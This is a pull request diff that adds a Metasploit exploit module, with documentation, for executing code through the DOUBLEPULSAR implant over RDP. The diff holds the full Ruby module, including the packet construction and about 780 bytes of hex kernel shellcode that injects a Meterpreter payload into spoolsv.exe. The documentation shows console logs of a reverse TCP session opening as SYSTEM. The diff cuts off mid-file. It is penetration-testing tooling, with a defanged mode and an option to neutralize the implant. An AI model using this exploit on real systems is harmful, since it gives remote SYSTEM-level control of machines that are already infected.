### PR TITLE
Add RDP DOUBLEPULSAR command and control module

### DIFF
--- a/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md
+++ b/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md
@@ -11,7 +11,7 @@ the `Neutralize implant` target allows you to disable the implant.
 ```
 Id  Name
 --  ----
-0   Execute payload
+0   Execute payload (x64)
 1   Neutralize implant
 ```
 

--- a/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md
+++ b/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md
@@ -38,7 +38,7 @@ msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check
 [*] 192.168.56.115:3389 - Attempting to connect using TLS security
 [*] 192.168.56.115:3389 - Swapping plain socket to SSL
 [*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
-[+] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
+[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
 [+] 192.168.56.115:3389 - Target is Windows 6.1.7601 x64
 [+] 192.168.56.115:3389 - The target is vulnerable.
 msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >
@@ -56,7 +56,7 @@ msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run
 [*] 192.168.56.115:3389 - Attempting to connect using TLS security
 [*] 192.168.56.115:3389 - Swapping plain socket to SSL
 [*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
-[+] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
+[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
 [+] 192.168.56.115:3389 - Target is Windows 6.1.7601 x64
 [*] 192.168.56.115:3389 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
 [*] 192.168.56.115:3389 - Total shellcode length: 4096 bytes
@@ -90,7 +90,7 @@ msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run
 [*] 192.168.56.115:3389 - Attempting to connect using TLS security
 [*] 192.168.56.115:3389 - Swapping plain socket to SSL
 [*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
-[+] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
+[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
 [+] 192.168.56.115:3389 - Target is Windows 6.1.7601 x64
 [*] 192.168.56.115:3389 - Neutralizing DOUBLEPULSAR
 [+] 192.168.56.115:3389 - Implant neutralization successful

--- a/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md
+++ b/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md
@@ -39,7 +39,7 @@ msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check
 [*] 192.168.56.115:3389 - Swapping plain socket to SSL
 [*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
 [!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
-[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 x64
+[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
 [+] 192.168.56.115:3389 - The target is vulnerable.
 msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >
 ```
@@ -57,7 +57,7 @@ msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run
 [*] 192.168.56.115:3389 - Swapping plain socket to SSL
 [*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
 [!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
-[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 x64
+[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
 [*] 192.168.56.115:3389 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
 [*] 192.168.56.115:3389 - Total shellcode length: 4096 bytes
 [*] 192.168.56.115:3389 - Sending shellcode to DOUBLEPULSAR
@@ -91,7 +91,7 @@ msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run
 [*] 192.168.56.115:3389 - Swapping plain socket to SSL
 [*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
 [!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
-[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 x64
+[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
 [*] 192.168.56.115:3389 - Neutralizing DOUBLEPULSAR
 [+] 192.168.56.115:3389 - Implant neutralization successful
 [*] Exploit completed, but no session was created.

--- a/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md
+++ b/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md
@@ -39,7 +39,7 @@ msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check
 [*] 192.168.56.115:3389 - Swapping plain socket to SSL
 [*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
 [!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
-[+] 192.168.56.115:3389 - Target is Windows 6.1.7601 x64
+[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 x64
 [+] 192.168.56.115:3389 - The target is vulnerable.
 msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >
 ```
@@ -57,7 +57,7 @@ msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run
 [*] 192.168.56.115:3389 - Swapping plain socket to SSL
 [*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
 [!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
-[+] 192.168.56.115:3389 - Target is Windows 6.1.7601 x64
+[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 x64
 [*] 192.168.56.115:3389 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
 [*] 192.168.56.115:3389 - Total shellcode length: 4096 bytes
 [*] 192.168.56.115:3389 - Sending shellcode to DOUBLEPULSAR
@@ -91,7 +91,7 @@ msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run
 [*] 192.168.56.115:3389 - Swapping plain socket to SSL
 [*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
 [!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
-[+] 192.168.56.115:3389 - Target is Windows 6.1.7601 x64
+[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 x64
 [*] 192.168.56.115:3389 - Neutralizing DOUBLEPULSAR
 [+] 192.168.56.115:3389 - Implant neutralization successful
 [*] Exploit completed, but no session was created.

--- a/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md
+++ b/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md
@@ -1,0 +1,99 @@
+## Introduction
+
+This module executes a Metasploit payload against the Equation Group's
+DOUBLEPULSAR implant for RDP.
+
+While this module primarily performs code execution against the implant,
+the `Neutralize implant` target allows you to disable the implant.
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Execute payload
+1   Neutralize implant
+```
+
+## Options
+
+**DefangedMode**
+
+Set this to `false` to disable defanged mode and enable module
+functionality. Set this only if you're SURE you want to proceed.
+
+**ProcessName**
+
+Set this to the userland process you want to inject the payload into.
+Defaults to `spoolsv.exe`.
+
+## Usage
+
+Pinging the implant:
+
+```
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check
+
+[*] 192.168.56.115:3389 - Verifying RDP protocol...
+[*] 192.168.56.115:3389 - Attempting to connect using TLS security
+[*] 192.168.56.115:3389 - Swapping plain socket to SSL
+[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
+[+] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
+[+] 192.168.56.115:3389 - Target is Windows 6.1.7601 x64
+[+] 192.168.56.115:3389 - The target is vulnerable.
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >
+```
+
+Executing a payload:
+
+```
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Execute\ payload
+target => Execute payload
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] 192.168.56.115:3389 - Verifying RDP protocol...
+[*] 192.168.56.115:3389 - Attempting to connect using TLS security
+[*] 192.168.56.115:3389 - Swapping plain socket to SSL
+[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
+[+] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
+[+] 192.168.56.115:3389 - Target is Windows 6.1.7601 x64
+[*] 192.168.56.115:3389 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
+[*] 192.168.56.115:3389 - Total shellcode length: 4096 bytes
+[*] 192.168.56.115:3389 - Sending shellcode to DOUBLEPULSAR
+[*] Sending stage (206403 bytes) to 192.168.56.115
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.115:49158) at 2019-11-25 18:10:21 -0600
+[+] 192.168.56.115:3389 - Payload execution successful
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-S7TDBIENPVM
+OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter >
+```
+
+Neutralizing the implant:
+
+```
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Neutralize\ implant
+target => Neutralize implant
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] 192.168.56.115:3389 - Verifying RDP protocol...
+[*] 192.168.56.115:3389 - Attempting to connect using TLS security
+[*] 192.168.56.115:3389 - Swapping plain socket to SSL
+[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
+[+] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
+[+] 192.168.56.115:3389 - Target is Windows 6.1.7601 x64
+[*] 192.168.56.115:3389 - Neutralizing DOUBLEPULSAR
+[+] 192.168.56.115:3389 - Implant neutralization successful
+[*] Exploit completed, but no session was created.
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >
+```

--- a/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md
+++ b/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md
@@ -11,7 +11,7 @@ the `Neutralize implant` target allows you to disable the implant.
 ```
 Id  Name
 --  ----
-0   Execute payload
+0   Execute payload (x64)
 1   Neutralize implant
 ```
 

--- a/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md
+++ b/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md
@@ -32,22 +32,22 @@ Defaults to `spoolsv.exe`.
 Pinging the implant:
 
 ```
-msf5 exploit(windows/smb/doublepulsar_rce) > check
+msf5 exploit(windows/smb/smb_doublepulsar_rce) > check
 
 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
 [*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
 [*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
 [!] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
 [+] 192.168.56.115:445 - The target is vulnerable.
-msf5 exploit(windows/smb/doublepulsar_rce) >
+msf5 exploit(windows/smb/smb_doublepulsar_rce) >
 ```
 
 Executing a payload:
 
 ```
-msf5 exploit(windows/smb/doublepulsar_rce) > set target Execute\ payload
+msf5 exploit(windows/smb/smb_doublepulsar_rce) > set target Execute\ payload
 target => Execute payload
-msf5 exploit(windows/smb/doublepulsar_rce) > run
+msf5 exploit(windows/smb/smb_doublepulsar_rce) > run
 
 [*] Started reverse TCP handler on 192.168.56.1:4444
 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
@@ -78,9 +78,9 @@ meterpreter >
 Neutralizing the implant:
 
 ```
-msf5 exploit(windows/smb/doublepulsar_rce) > set target Neutralize\ implant
+msf5 exploit(windows/smb/smb_doublepulsar_rce) > set target Neutralize\ implant
 target => Neutralize implant
-msf5 exploit(windows/smb/doublepulsar_rce) > run
+msf5 exploit(windows/smb/smb_doublepulsar_rce) > run
 
 [*] Started reverse TCP handler on 192.168.56.1:4444
 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
@@ -90,5 +90,5 @@ msf5 exploit(windows/smb/doublepulsar_rce) > run
 [*] 192.168.56.115:445 - Neutralizing DOUBLEPULSAR
 [+] 192.168.56.115:445 - Implant neutralization successful
 [*] Exploit completed, but no session was created.
-msf5 exploit(windows/smb/doublepulsar_rce) >
+msf5 exploit(windows/smb/smb_doublepulsar_rce) >
 ```

--- a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
+++ b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # https://www.gaijin.at/en/infos/windows-version-numbers
     magic, _, major, minor, build = res.unpack('V5')
-    sp, product, arch = res[-3..-1].unpack('C3')
+    sp, _, _, product, arch = res[-8..-1].unpack('VC4')
 
     return unless magic == DOUBLEPULSAR_MAGIC
 

--- a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
+++ b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
@@ -167,7 +167,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'Execute payload'
       print_status("Generating kernel shellcode with #{datastore['PAYLOAD']}")
       shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])
-      shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)
+      shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)
       vprint_status("Total shellcode length: #{shellcode.length} bytes")
 
       print_status('Sending shellcode to DOUBLEPULSAR')

--- a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
+++ b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
@@ -68,10 +68,16 @@ class MetasploitModule < Msf::Exploit::Remote
     burn: 0x03
   }.freeze
 
-  DOUBLEPULSAR_MAGIC = [0x19283744].pack('V')
+  DOUBLEPULSAR_MAGIC = 0x19283744
 
-  def check_doublepulsar_success?(res)
-    res && res.length == 288 && res.start_with?(DOUBLEPULSAR_MAGIC)
+  def parse_doublepulsar_ping(res)
+    return unless res && res.length == 288
+
+    magic, _, major, minor, build, arch = res.unpack('V6')
+
+    return unless magic == DOUBLEPULSAR_MAGIC
+
+    "Windows #{major}.#{minor}.#{build} #{arch == 2 ? 'x64' : 'x86'}"
   end
 
   def setup
@@ -103,12 +109,13 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status('Sending ping to DOUBLEPULSAR')
     res = do_rdp_doublepulsar_pkt(OPCODES[:ping])
 
-    unless check_doublepulsar_success?(res)
+    unless (info = parse_doublepulsar_ping(res))
       vprint_error('DOUBLEPULSAR not detected or disabled')
       return CheckCode::Safe
     end
 
     vprint_good('DOUBLEPULSAR RDP IMPLANT DETECTED!!!')
+    vprint_good("Target is #{info}")
     CheckCode::Vulnerable
   end
 
@@ -175,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
     pkt << "\x00\x00"         # Packet Length
     pkt << "\x02\xf0\x80\x3c" # TPDU (X.224)
 
-    pkt << DOUBLEPULSAR_MAGIC
+    pkt << [DOUBLEPULSAR_MAGIC].pack('V')
     pkt << [opcode].pack('v')
 
     if body

--- a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
+++ b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
@@ -1,0 +1,279 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::RDP
+
+  MAX_SHELLCODE_SIZE = 4096
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'             => 'RDP DOUBLEPULSAR Remote Code Execution',
+      'Description'      => %q{
+        This module executes a Metasploit payload against the Equation Group's
+        DOUBLEPULSAR implant for RDP.
+
+        While this module primarily performs code execution against the implant,
+        the "Neutralize implant" target allows you to disable the implant.
+      },
+      'Author'           => [
+        'Equation Group', # DOUBLEPULSAR implant
+        'Shadow Brokers', # Equation Group dump
+        'Luke Jennings',  # DOPU analysis and detection
+        'wvu'             # RDP DOPU analysis and module
+      ],
+      'References'       => [
+        ['URL', 'https://github.com/countercept/doublepulsar-detection-script']
+      ],
+      'DisclosureDate'   => '2017-04-14', # Shadow Brokers leak
+      'License'          => MSF_LICENSE,
+      'Platform'         => 'win',
+      'Arch'             => ARCH_X64,
+      'Privileged'       => true,
+      'Payload'          => {
+        'Space'          => MAX_SHELLCODE_SIZE - kernel_shellcode_size,
+        'DisableNops'    => true
+      },
+      'Targets'          => [
+        ['Execute payload',    {}],
+        ['Neutralize implant', {}]
+      ],
+      'DefaultTarget'    => 0,
+      'DefaultOptions'   => {
+        'EXITFUNC'       => 'thread',
+        'PAYLOAD'        => 'windows/x64/meterpreter/reverse_tcp'
+      },
+      'Notes'            => {
+        'AKA'            => ['DOUBLEPULSAR'],
+        'RelatedModules' => ['exploit/windows/smb/doublepulsar_rce'],
+        'Stability'      => [CRASH_OS_DOWN],
+        'Reliability'    => [REPEATABLE_SESSION]
+      }
+    ))
+
+    register_advanced_options([
+      OptBool.new('DefangedMode',  [true, 'Run in defanged mode', true]),
+      OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])
+    ])
+  end
+
+  OPCODES = {
+    exec: 0x01,
+    ping: 0x02,
+    burn: 0x03
+  }.freeze
+
+  DOUBLEPULSAR_MAGIC = [0x19283744].pack('V')
+
+  def check_doublepulsar_success?(res)
+    res && res.length == 288 && res.start_with?(DOUBLEPULSAR_MAGIC)
+  end
+
+  def setup
+    super
+
+    rdp_connect
+    is_rdp, server_selected_protocol = rdp_check_protocol
+
+    fail_with(Failure::BadConfig, 'Target port is not RDP') unless is_rdp
+
+    case server_selected_protocol
+    when RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX
+      fail_with(Failure::BadConfig, 'DOUBLEPULSAR does not support NLA')
+    when RDPConstants::PROTOCOL_SSL
+      vprint_status('Swapping plain socket to SSL')
+      swap_sock_plain_to_ssl
+    end
+  rescue Rex::ConnectionError, RdpCommunicationError => e
+    fail_with(Failure::Disconnected, e.message)
+  end
+
+  def cleanup
+    rdp_disconnect
+
+    super
+  end
+
+  def check
+    vprint_status('Sending ping to DOUBLEPULSAR')
+    res = do_rdp_doublepulsar_pkt(OPCODES[:ping])
+
+    unless check_doublepulsar_success?(res)
+      vprint_error('DOUBLEPULSAR not detected or disabled')
+      return CheckCode::Safe
+    end
+
+    vprint_good('DOUBLEPULSAR RDP IMPLANT DETECTED!!!')
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    if datastore['DefangedMode']
+      warning = <<~EOF
+
+
+        Are you SURE you want to execute code against a nation-state implant?
+        You MAY contaminate forensic evidence if there is an investigation.
+
+        Disable the DefangedMode option if you have authorization to proceed.
+      EOF
+
+      fail_with(Failure::BadConfig, warning)
+    end
+
+    # No ForceExploit because check is accurate
+    unless check == CheckCode::Vulnerable
+      fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')
+    end
+
+    case target.name
+    when 'Execute payload'
+      print_status("Generating kernel shellcode with #{datastore['PAYLOAD']}")
+      shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])
+      shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)
+      vprint_status("Total shellcode length: #{shellcode.length} bytes")
+
+      print_status('Sending shellcode to DOUBLEPULSAR')
+      res = do_rdp_doublepulsar_pkt(OPCODES[:exec], shellcode)
+    when 'Neutralize implant'
+      return neutralize_implant
+    end
+
+    if res
+      fail_with(Failure::UnexpectedReply, 'Unexpected response from implant')
+    end
+
+    print_good('Payload execution successful')
+  end
+
+  def neutralize_implant
+    print_status('Neutralizing DOUBLEPULSAR')
+    res = do_rdp_doublepulsar_pkt(OPCODES[:burn])
+
+    if res
+      fail_with(Failure::UnexpectedReply, 'Unexpected response from implant')
+    end
+
+    print_good('Implant neutralization successful')
+  end
+
+  def do_rdp_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)
+    rdp_send_recv(make_rdp_mcs_doublepulsar(opcode, body))
+  rescue Errno::ECONNRESET, RdpCommunicationError
+    nil
+  end
+
+  # https://tools.ietf.org/html/rfc2126
+  def make_rdp_mcs_doublepulsar(opcode, body)
+    pkt  = "\x03"             # Protocol Version Number (3)
+    pkt << "\x00"             # Reserved (0)
+    pkt << "\x00\x00"         # Packet Length
+    pkt << "\x02\xf0\x80\x3c" # TPDU (X.224)
+
+    pkt << DOUBLEPULSAR_MAGIC
+    pkt << [opcode].pack('v')
+
+    if body
+      pkt << [body.length, body.length, 0].pack('V*')
+      pkt << body
+    end
+
+    # Patch in total TPKT length
+    pkt[2, 2] = [pkt.length].pack('n')
+
+    pkt
+  end
+
+  # ring3 = user mode encoded payload
+  # proc_name = process to inject APC into
+  def make_kernel_user_payload(ring3, proc_name)
+    sc = make_kernel_shellcode(proc_name)
+
+    sc << [ring3.length].pack('S<')
+    sc << ring3
+
+    sc
+  end
+
+  def generate_process_hash(process)
+    # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
+    proc_hash = 0
+    process << "\x00"
+
+    process.each_byte do |c|
+      proc_hash = ror(proc_hash, 13)
+      proc_hash += c
+    end
+
+    [proc_hash].pack('l<')
+  end
+
+  def ror(dword, bits)
+    (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF
+  end
+
+  def make_kernel_shellcode(proc_name)
+    # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
+    # Length: 780 bytes
+    "\x31\xc9\x41\xe2\x01\xc3\x56\x41\x57\x41\x56\x41\x55\x41\x54\x53" \
+    "\x55\x48\x89\xe5\x66\x83\xe4\xf0\x48\x83\xec\x20\x4c\x8d\x35\xe3" \
+    "\xff\xff\xff\x65\x4c\x8b\x3c\x25\x38\x00\x00\x00\x4d\x8b\x7f\x04" \
+    "\x49\xc1\xef\x0c\x49\xc1\xe7\x0c\x49\x81\xef\x00\x10\x00\x00\x49" \
+    "\x8b\x37\x66\x81\xfe\x4d\x5a\x75\xef\x41\xbb\x5c\x72\x11\x62\xe8" \
+    "\x18\x02\x00\x00\x48\x89\xc6\x48\x81\xc6\x08\x03\x00\x00\x41\xbb" \
+    "\x7a\xba\xa3\x30\xe8\x03\x02\x00\x00\x48\x89\xf1\x48\x39\xf0\x77" \
+    "\x11\x48\x8d\x90\x00\x05\x00\x00\x48\x39\xf2\x72\x05\x48\x29\xc6" \
+    "\xeb\x08\x48\x8b\x36\x48\x39\xce\x75\xe2\x49\x89\xf4\x31\xdb\x89" \
+    "\xd9\x83\xc1\x04\x81\xf9\x00\x00\x01\x00\x0f\x8d\x66\x01\x00\x00" \
+    "\x4c\x89\xf2\x89\xcb\x41\xbb\x66\x55\xa2\x4b\xe8\xbc\x01\x00\x00" \
+    "\x85\xc0\x75\xdb\x49\x8b\x0e\x41\xbb\xa3\x6f\x72\x2d\xe8\xaa\x01" \
+    "\x00\x00\x48\x89\xc6\xe8\x50\x01\x00\x00\x41\x81\xf9" +
+    generate_process_hash(proc_name.upcase) +
+    "\x75\xbc\x49\x8b\x1e\x4d\x8d\x6e\x10\x4c\x89\xea\x48\x89\xd9" \
+    "\x41\xbb\xe5\x24\x11\xdc\xe8\x81\x01\x00\x00\x6a\x40\x68\x00\x10" \
+    "\x00\x00\x4d\x8d\x4e\x08\x49\xc7\x01\x00\x10\x00\x00\x4d\x31\xc0" \
+    "\x4c\x89\xf2\x31\xc9\x48\x89\x0a\x48\xf7\xd1\x41\xbb\x4b\xca\x0a" \
+    "\xee\x48\x83\xec\x20\xe8\x52\x01\x00\x00\x85\xc0\x0f\x85\xc8\x00" \
+    "\x00\x00\x49\x8b\x3e\x48\x8d\x35\xe9\x00\x00\x00\x31\xc9\x66\x03" \
+    "\x0d\xd7\x01\x00\x00\x66\x81\xc1\xf9\x00\xf3\xa4\x48\x89\xde\x48" \
+    "\x81\xc6\x08\x03\x00\x00\x48\x89\xf1\x48\x8b\x11\x4c\x29\xe2\x51" \
+    "\x52\x48\x89\xd1\x48\x83\xec\x20\x41\xbb\x26\x40\x36\x9d\xe8\x09" \
+    "\x01\x00\x00\x48\x83\xc4\x20\x5a\x59\x48\x85\xc0\x74\x18\x48\x8b" \
+    "\x80\xc8\x02\x00\x00\x48\x85\xc0\x74\x0c\x48\x83\xc2\x4c\x8b\x02" \
+    "\x0f\xba\xe0\x05\x72\x05\x48\x8b\x09\xeb\xbe\x48\x83\xea\x4c\x49" \
+    "\x89\xd4\x31\xd2\x80\xc2\x90\x31\xc9\x41\xbb\x26\xac\x50\x91\xe8" \
+    "\xc8\x00\x00\x00\x48\x89\xc1\x4c\x8d\x89\x80\x00\x00\x00\x41\xc6" \
+    "\x01\xc3\x4c\x89\xe2\x49\x89\xc4\x4d\x31\xc0\x41\x50\x6a\x01\x49" \
+    "\x8b\x06\x50\x41\x50\x48\x83\xec\x20\x41\xbb\xac\xce\x55\x4b\xe8" \
+    "\x98\x00\x00\x00\x31\xd2\x52\x52\x41\x58\x41\x59\x4c\x89\xe1\x41" \
+    "\xbb\x18\x38\x09\x9e\xe8\x82\x00\x00\x00\x4c\x89\xe9\x41\xbb\x22" \
+    "\xb7\xb3\x7d\xe8\x74\x00\x00\x00\x48\x89\xd9\x41\xbb\x0d\xe2\x4d" \
+    "\x85\xe8\x66\x00\x00\x00\x48\x89\xec\x5d\x5b\x41\x5c\x41\x5d\x41" \
+    "\x5e\x41\x5f\x5e\xc3\xe9\xb5\x00\x00\x00\x4d\x31\xc9\x31\xc0\xac" \
+    "\x41\xc1\xc9\x0d\x3c\x61\x7c\x02\x2c\x20\x41\x01\xc1\x38\xe0\x75" \
+    "\xec\xc3\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \
+    "\x20\x48\x8b\x12\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x45\x31\xc9" \
+    "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1" \
+    "\xe2\xee\x45\x39\xd9\x75\xda\x4c\x8b\x7a\x20\xc3\x4c\x89\xf8\x41" \
+    "\x51\x41\x50\x52\x51\x56\x48\x89\xc2\x8b\x42\x3c\x48\x01\xd0\x8b" \
+    "\x80\x88\x00\x00\x00\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20" \
+    "\x49\x01\xd0\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\xe8\x78\xff" \
+    "\xff\xff\x45\x39\xd9\x75\xec\x58\x44\x8b\x40\x24\x49\x01\xd0\x66" \
+    "\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48" \
+    "\x01\xd0\x5e\x59\x5a\x41\x58\x41\x59\x41\x5b\x41\x53\xff\xe0\x56" \
+    "\x41\x57\x55\x48\x89\xe5\x48\x83\xec\x20\x41\xbb\xda\x16\xaf\x92" \
+    "\xe8\x4d\xff\xff\xff\x31\xc9\x51\x51\x51\x51\x41\x59\x4c\x8d\x05" \
+    "\x1a\x00\x00\x00\x5a\x48\x83\xec\x20\x41\xbb\x46\x45\x1b\x22\xe8" \
+    "\x68\xff\xff\xff\x48\x89\xec\x5d\x41\x5f\x5e\xc3"
+  end
+
+  def kernel_shellcode_size
+    make_kernel_shellcode('').length
+  end
+
+end

--- a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
+++ b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
@@ -175,25 +175,25 @@ class MetasploitModule < Msf::Exploit::Remote
     nil
   end
 
-  # https://tools.ietf.org/html/rfc2126
+=begin
+  MULTIPOINT-COMMUNICATION-SERVICE T.125
+      DomainMCSPDU: channelJoinConfirm (15)
+          channelJoinConfirm
+              result: rt-domain-not-hierarchical (2)
+              initiator: 14120
+              requested: 6402
+=end
   def make_rdp_mcs_doublepulsar(opcode, body)
-    pkt  = "\x03"             # Protocol Version Number (3)
-    pkt << "\x00"             # Reserved (0)
-    pkt << "\x00\x00"         # Packet Length
-    pkt << "\x02\xf0\x80\x3c" # TPDU (X.224)
-
-    pkt << [DOUBLEPULSAR_MAGIC].pack('V')
-    pkt << [opcode].pack('v')
+    data  = "\x3c" # channelJoinConfirm
+    data << [DOUBLEPULSAR_MAGIC].pack('V')
+    data << [opcode].pack('v')
 
     if body
-      pkt << [body.length, body.length, 0].pack('V*')
-      pkt << body
+      data << [body.length, body.length, 0].pack('V*')
+      data << body
     end
 
-    # Patch in total TPKT length
-    pkt[2, 2] = [pkt.length].pack('n')
-
-    pkt
+    build_data_tpdu(data)
   end
 
   # ring3 = user mode encoded payload

--- a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
+++ b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb
@@ -22,10 +22,12 @@ class MetasploitModule < Msf::Exploit::Remote
         the "Neutralize implant" target allows you to disable the implant.
       },
       'Author'           => [
-        'Equation Group', # DOUBLEPULSAR implant
-        'Shadow Brokers', # Equation Group dump
-        'Luke Jennings',  # DOPU analysis and detection
